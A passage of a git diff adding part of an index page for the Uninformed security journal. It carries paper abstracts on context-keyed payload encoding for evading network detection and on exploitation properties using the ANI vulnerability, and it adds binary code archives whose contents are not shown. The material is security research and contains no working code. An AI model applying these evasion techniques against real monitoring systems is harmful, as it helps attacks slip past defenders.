along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed. +html | pdf | txt + +Context-keyed Payload Encoding +I)ruid +A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information. +html | pdf | txt + +Improving Software Security Analysis using Exploitation Properties +skape +Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration. +html | pdf | txt + diff --git a/uninformed/code.1.1.tgz b/uninformed/code.1.1.tgz new file mode 100644 index 0000000..03710c9 Binary files /dev/null and b/uninformed/code.1.1.tgz differ diff --git a/uninformed/code.1.4.tgz b/uninformed/code.1.4.tgz new file mode 100644 index 0000000..45b6fb5 Binary files /dev/null and b/uninformed/code.1.4.tgz differ diff --git a/uninformed/code.2.2.tgz b/uninformed/code.2.2.tgz new file mode 100644 index 0000000..36456f0 Binary files /dev/null and b/uninformed/code.2.2.tgz differ diff --git a/uninformed/code.3.3.tgz b/uninformed/code.3.3.tgz new file mode 100644 index 0000000..c15697b Binary files /dev/null and b/uninformed/code.3.3.tgz differ diff --git a/uninformed/code.3.6.tgz b/uninformed/code.3.6.tgz new file mode 100644 index 0000000..6af67eb Binary files /dev/null and b/uninformed/code.3.6.tgz differ diff --git a/uninformed/code.4.4.tgz b/uninformed/code.4.4.tgz new file mode 100644 index 0000000..2debc0d Binary files /dev/null and b/uninformed/code.4.4.tgz differ diff --git a/uninformed/code.6.1.tgz b/uninformed/code.6.1.tgz new file mode 100644 index 0000000..e00a964 Binary files /dev/null and b/uninformed/code.6.1.tgz differ diff --git a/uninformed/code.6.2.tgz b/uninformed/code.6.2.tgz new file mode 100644 index 0000000..c38842c Binary files /dev/null and b/uninformed/code.6.2.tgz differ diff --git a/uninformed/code.6.3.tgz b/uninformed/code.6.3.tgz new file mode 100644 index 0000000..604cd0c Binary files /dev/null and b/uninformed/code.6.3.tgz differ diff --git a/uninformed/code.7.1.tgz b/uninformed/code.7.1.tgz new file mode 100644 index 0000000..dedad8b Binary files /dev/null and b/uninformed/code.7.1.tgz differ diff --git a/uninformed/code.7.2.tgz b/uninformed/code.7.2.tgz new file mode 100644 index 0000000..e305550 Binary files /dev/null and b/uninformed/code.7.2.tgz differ diff --git a/uninformed/code.8.1.tgz b/uninformed/code.8.1.tgz new file mode 100644 index 0000000..afe4e57 Binary files /dev/null and b/uninformed/code.8.1.tgz differ diff --git a/uninformed/code.8.2.tgz b/uninformed/code.8.2.tgz new file mode 100644 index 0000000..3ddb5c7 Binary files /dev/null and b/uninformed/code.8.2.tgz differ diff --git a/uninformed/code.8.3.tgz b/uninformed/code.8.3.tgz new file mode 100644 index 0000000..a0adf0c Binary files /dev/null and b/uninformed/code.8.3.tgz differ diff --git a/uninformed/code.8.4.zip b/uninformed/code.8.4.zip new file mode 100644 index 0000000..c2cce7f Binary files /dev/null and b/uninformed/code.8.4.zip differ diff --git a/uninformed/code.8.6.tgz b/uninformed/code.8.6.tgz new file mode 100644 index 0000000..9e84a99 Binary files /dev/null and b/uninformed/code.8.6.tgz differ